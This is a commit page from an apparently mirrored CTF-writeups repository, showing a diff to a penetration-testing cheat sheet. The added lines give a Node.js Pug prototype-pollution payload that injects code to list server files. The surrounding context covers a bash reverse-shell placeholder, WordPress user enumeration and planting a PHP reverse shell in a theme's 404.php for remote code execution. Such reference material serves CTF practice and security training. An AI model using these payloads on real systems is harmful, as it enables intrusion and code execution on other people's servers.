Mirrors/CTF-Writeups
2
0
Fork 0
mirror of https://github.com/AbdullahRizwan101/CTF-Writeups synced 2024-11-25 13:20:18 +00:00
Code Issues Projects Releases Packages Wiki Activity

Update Cheat Sheet.md

Browse source
This commit is contained in:
ARZ 2021-08-20 13:48:26 +05:00 committed by GitHub
parent bb86b16be1
commit 560dcaf551
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 20 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

21
Cheat Sheet.md
View file

@ -546,7 +546,6 @@ Here `api-endpoint` can be for example `/api/v1/resources/books\?FUZZ\=.bash_his
### Web Shell Bash ### Web Shell Bash
`bash -c "<bash_rev_shell>"` `bash -c "<bash_rev_shell>"`
### Wordpress ### Wordpress
using wpscan we can find users or do some further enumeration of wordpress version using wpscan we can find users or do some further enumeration of wordpress version
* `wpscan --url http://<ip>/wordpress -e u` Enumerate Users * `wpscan --url http://<ip>/wordpress -e u` Enumerate Users
@ -563,6 +562,26 @@ To get a RCE
* Goto `Appearance` -> `Editor` Select the 404.php template of the current theme and paste php reverse-shell. * Goto `Appearance` -> `Editor` Select the 404.php template of the current theme and paste php reverse-shell.
* Then navigate to `http://ip/wp-content/themes/twentyfifteen/404.php` (theme name can be twentytwenty for the latest one) * Then navigate to `http://ip/wp-content/themes/twentyfifteen/404.php` (theme name can be twentytwenty for the latest one)
### Node JS
#### Prototype Pollution
##### PUG
```
{
"key": "value",
"__proto__.block":
{
"type": "Text",
"line": "test;return process.mainModule.constructor._load('fs').readdirSync('./', {encoding:'utf8', flag:'r'})",
"val": "THIS IS THE VALUE"
}
}
```
### Apache Tomcat ### Apache Tomcat
``` ```